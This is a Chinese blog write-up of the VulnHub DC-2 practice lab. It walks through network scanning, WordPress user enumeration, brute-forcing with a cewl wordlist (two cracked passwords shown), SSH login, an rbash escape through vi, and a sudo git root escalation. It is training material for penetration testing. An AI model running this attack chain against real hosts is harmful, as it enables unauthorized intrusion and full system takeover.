vulnhub DC-2靶场

发布时间 2023-12-17 21:46:42作者: 羲和跃明

1.信息收集

扫描存活主机

sudo arp-scan -l

1

扫描主机开放端口

nmap -p- 192.168.42.155

2

扫描主机开放端口的具体服务

nmap -p 80,7744 -sV -A 192.168.42.155

3

80端口是网页,7744是SSH

日常扫描指纹

whatweb 192.168.42.155

4

2.漏洞挖掘

访问网站,发现无法访问,猜测为hosts问题

5

改写host文件

vim /etc/hosts

192.168.42.155 dc-2

8

成功访问,开始逛街

6

点击flag,得到FLAG1

7

没东西了,开始扫扫路径

dirb http://dc-2/

8 (2)

发现一个登录框,是wordpass建站模板

先一个默认密码,没成功,再想想办法

9

找到一个专门找wp账号的工具

wpscan --url dc-2 -e u

10

找到三个用户,admin,jerry,tom

11

既然有账号,就有想办法得到密码,上cewl工具,

cwel http://dc-2 -w dict.txt

12

有了账号密码,开始爆破

13

爆破成功

tom

parturient

jerry

adipiscing

14

3.漏洞利用

登录两个账号看看

15

在jerry账号中page找到FLAG2

20

根据FLAG2的内容,我们尝试ssh登录

ssh服务在7744

ssh tom@192.168.42.155 -p 7744

21

cat 发现报错(-rbash

rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。

于是查找可用命令

echo $PATH

echo /home/tom/usr/bin/*

只有less,ls,scp,vi

111

命令太少,尝试rbash逃逸

export

显示环境变量

22

输入以下命令

vi shell

:set shell=/bin/sh
:shell

$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/

222

逃逸成功,查看flag3.txt

16

理解内容,他让su用户

17.

4.提升权限

找一下新的FLAG4

find / -name *flag*

25

还有FLAG,开始提权

26

常规命令

find / -perm -u=s -type f 2>/dev/null

23

发现没什么特殊的,换命令

发现git命令

sudo -l

24

不会用,有网站

查一下git

27

找一条你喜欢的命令

sudo git -p help config

!/bin/sh

28

提权成功,拿到全部FLAG

cat /root/final-flag.txt

29